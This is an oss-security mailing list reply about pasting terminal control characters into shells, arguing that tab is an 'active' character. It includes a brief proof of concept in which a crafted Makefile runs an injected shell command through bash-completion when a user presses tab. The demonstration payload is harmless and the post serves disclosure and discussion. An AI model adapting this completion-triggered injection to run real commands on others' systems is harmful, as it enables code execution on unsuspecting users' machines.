Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 16 Apr 2018 10:15:00 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: Re: Terminal Control Chars

* David A. Wheeler <dwheeler@...eeler.com>, 2018-04-12, 17:18:
>Russ Allbery:
>>I think a useful definition of "control character" in this context 
>>(and I realize this doesn't exactly match the ASCII definition) is a 
>>character that results in an action other than insertion being 
>>taken... CR and LF would not be control characters in that definition, 
>>since they insert a newline and don't cause an action. Similarly, TAB 
>>wouldn't be a control character in that definition.
>
>As you noted, that definition doesn't match the ASCII definition, but I 
>also think it's misleading.  If someone pastes a CR/LF into a shell 
>prompt, it certainly *DOES* cause an action,

Similarly, tab is an "active" character in most shells.

In the worst case (the victim uses bash with bash-completion installed, 
and the attacker has write access to the victim's filesystem), pasting 
tab can be as bad as pasting LF.

Here's a proof of concept:

   $ printf 'x := $(shell (echo; cowsay pwned)>/dev/tty)' > moo
   $ make -f moo <tab>
    _______
   < pwned >
    -------
           \   ^__^
            \  (oo)\_______
               (__)\       )\/\
                   ||----w |
                   ||     ||

Credit for discovering this goes to Dan Rosenberg:
https://twitter.com/djrbliss/status/699363006946344963

-- 
Jakub Wilk

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.